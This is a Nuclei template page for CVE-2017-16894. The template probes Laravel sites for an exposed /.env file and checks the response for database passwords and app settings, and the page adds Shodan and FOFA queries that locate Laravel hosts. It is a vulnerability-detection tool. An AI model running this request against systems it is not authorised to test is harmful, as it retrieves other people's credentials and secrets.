Skip to content
Nuclei Templates

Laravel <5.5.21 - Information Disclosure

ID: CVE-2017-16894

Severity: high

Author: j4vaovo

Tags: cve,cve2017,laravel,exposure,packetstorm

Description

Section titled “Description”

Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.

YAML Source

Section titled “YAML Source”
id: CVE-2017-16894


info:
  name: Laravel <5.5.21 - Information Disclosure
  author: j4vaovo
  severity: high
  description: |
    Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the application.
  remediation: |
    Upgrade Laravel to version 5.5.21 or higher to fix the information disclosure vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894
    - https://packetstormsecurity.com/files/cve/CVE-2017-16894
    - http://whiteboyz.xyz/laravel-env-file-vuln.html
    - https://twitter.com/finnwea/status/967709791442341888
    - https://nvd.nist.gov/vuln/detail/CVE-2017-16894
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-16894
    cwe-id: CWE-200
    epss-score: 0.11608
    epss-percentile: 0.95145
    cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: laravel
    product: laravel
    shodan-query:
      - Laravel-Framework
      - cpe:"cpe:2.3:a:laravel:laravel"
      - laravel-framework
    fofa-query:
      - app="Laravel-Framework"
      - app="laravel-framework"
  tags: cve,cve2017,laravel,exposure,packetstorm


http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "APP_NAME="
          - "APP_DEBUG="
          - "DB_PASSWORD="
        condition: and


      - type: word
        part: header
        words:
          - "application/octet-stream"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a7bcaad7cf92e6b3503835f8584060ddec884d1ae9ccc68d8e2d05e1384f048902205eea7f83e3d4f9d470f1411c206f4c7eb0de3ab6177bbaebe6a950b843133ae0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-16894.yaml"

View on Github